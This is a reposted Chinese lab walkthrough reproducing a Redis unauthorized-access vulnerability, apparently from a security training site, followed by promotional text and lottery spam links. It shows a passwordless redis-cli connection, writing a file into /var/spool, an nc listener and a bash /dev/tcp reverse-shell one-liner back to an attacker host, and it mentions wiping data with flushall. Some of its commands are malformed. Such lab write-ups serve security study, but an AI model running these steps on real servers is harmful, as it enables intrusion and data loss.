安基网 首页 安全 攻防案例 查看内容

Redis未授权访问漏洞复现,通往黑客大牛的必经之路

2020-5-2 02:07| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据 ...


0x01 redis介绍

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。

Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。

话不多说直接开始做实验。

攻击机ip为192.168.31.91


Kali为第二台攻击机ip为192.168.31.121


靶机ip为192.168.31.176上存在redis未授权访问漏洞,所以可以直接进行无密码连接。


Redis的服务已经启动了,端口在6379上。

先用第一台攻击机连接靶机Redis-cli –h 192.168.31.176


往192.168.31.176靶机的/var/spool里写入命令,然后保存名字为root的文件。


进入靶机的dockers的里面

docker exec –it $(docker ps | grep –Eo "[0-9a-zA-Z]" /bin/bash

root就是刚刚自己写入的文件!!

然后cat root 查看一下root文件的内容。


由于docker的这个靶机没有crontab这个自动执行的文件,所以我们手动验证一下。

Kali 用nc -lvvp 4444进行监听。

靶机执行/bin/bash -i >& /dev/tcp/192.168.31.131/4444 0>&1

一执行就连接上了,现在我们在kali里执行一下命令试试看!


你看吧,任意执行shell命令!!

最后喜欢我文章的朋友请加圈子关注我们,私信关键词:学习。(送免费资料和优惠券)

就会自动分享给你微信号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6790617808481812995/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
永发彩票计划群 拉菲彩票计划群 快钱彩票计划群 彩8彩票计划群 53彩票计划群 上海11选5走势 福运来彩票计划群 金彩票计划群 内蒙古11选5 K8彩票计划群